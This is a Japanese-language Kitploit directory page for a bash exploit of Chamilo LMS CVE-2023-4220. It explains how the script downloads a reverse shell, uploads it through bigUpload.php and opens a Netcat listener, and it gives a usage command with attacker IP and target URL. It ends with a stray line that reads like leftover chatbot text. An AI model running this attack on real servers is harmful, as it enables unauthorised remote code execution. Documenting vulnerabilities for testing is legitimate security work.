Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Chamilo-LMS-CVE-2023-4220-Exploit — 改修 Chamilo LMS CVE-2023-4220 エクスプロイト (bashで記述) | Kitploit
ツール/GitHubGitHub/0xdtc/chamilo-lms-cve-2023-4220-exploit
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストレッドチーミング
GitHub0xdtc/chamilo-lms-cve-2023-4220-exploit

Chamilo-LMS-CVE-2023-4220-Exploit

改修 Chamilo LMS CVE-2023-4220 エクスプロイト (bashで記述)

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
1年前未レビュー

知識を買ってください

Chamilo LMS CVE-2023-4220 エクスプロイト

概要

このスクリプトは Chamilo LMS バージョン ≤ v1.11.24 におけるリモートコード実行(RCE)脆弱性を悪用します。この脆弱性(CVE-2023-4220)は、Chamilo LMS の bigUpload.php 機能における無制限ファイルアップロードの不備に起因し、攻撃者が任意のファイル(Webシェルなど)をアップロード・実行することで、サーバ上での完全なリモートコード実行を可能にします。

本スクリプトは Divine Clown によって強化され、攻撃プロセスを効率化し、リバースシェルファイルの自動生成、ターゲットへのアップロード、リスナーの起動によるシェルへの直接アクセスを実現します。


CVE 詳細

  • CVE ID: CVE-2023-4220
  • 影響を受けるソフトウェア: Chamilo LMS ≤ v1.11.24
  • 脆弱性の種類: リモートコード実行(RCE)
  • 攻撃ベクトル: /main/inc/lib/javascript/bigupload/inc/bigUpload.php における無制限ファイルアップロード

機能

  • 攻撃者の IP とポートに基づいて revshells.com からリバースシェルを自動ダウンロード。
  • 脆弱な bigUpload.php エンドポイントを使用してリバースシェルをアップロード。
  • シェルを静かに起動し、Netcat リスナーを開いて直接アクセスを提供。

Divine Clown による強化:

  • シェルのダウンロード、アップロードなどの中間ステップを非表示にし、結果のリバースシェルのみを表示することで効率的に使用できます。

使用方法

root@kitploit:~
./CVE-2023-4220.sh -i <攻撃者_IP> -p <ポート> -h <ホストリンク>

パラメータ:

  • -i <攻撃者_IP>: リバースシェル用の攻撃者の IP アドレス。
  • -p <ポート>: Netcat リスナーを起動するポート。
  • -h <ホストリンク>: 脆弱な Chamilo LMS インスタンスの完全な URL。

例:

root@kitploit:~
./CVE-2023-4220.sh -i 10.10.14.15 -p 9001 -h http://target-site.com

前提条件

  • マシンに Netcat がインストールされていること。
  • 対象の Chamilo LMS バージョンが脆弱であること(≤ v1.11.24)。
  • ペネトレーションテストまたは悪用を実行する適切な許可。

技術的な内訳

  1. スクリプトは revshells.com からリバースシェルをダウンロードし、攻撃者の IP とポートに基づいて動的に生成します。
  2. リバースシェルは脆弱な bigUpload.php エンドポイントにアップロードされます。
  3. アップロードされたファイルは、サーバ上でその URL にアクセスすることで実行されます。
  4. Netcat リスナーが起動され、ファイルがトリガーされるとリバースシェル接続が確立され、攻撃者にコマンドラインアクセスが提供されます。

法的免責事項

このツールは教育目的および明示的に脆弱性を悪用する許可を得たテスト環境のみを対象としています。システムへの不正アクセスは違法であり、刑事罰の対象となる可能性があります。著者は、このスクリプトの誤用またはそれによって生じた損害について一切の責任を負いません。


クレジット

  • オリジナルエクスプロイト作者: Ziad Sakr @Ziad-Sakr
  • 強化と改良: ME(Divine Clown)

README に追加情報や書式を含めたい場合は、自由に修正してください。他に必要なものがあればお知らせください。

ツールをダウンロード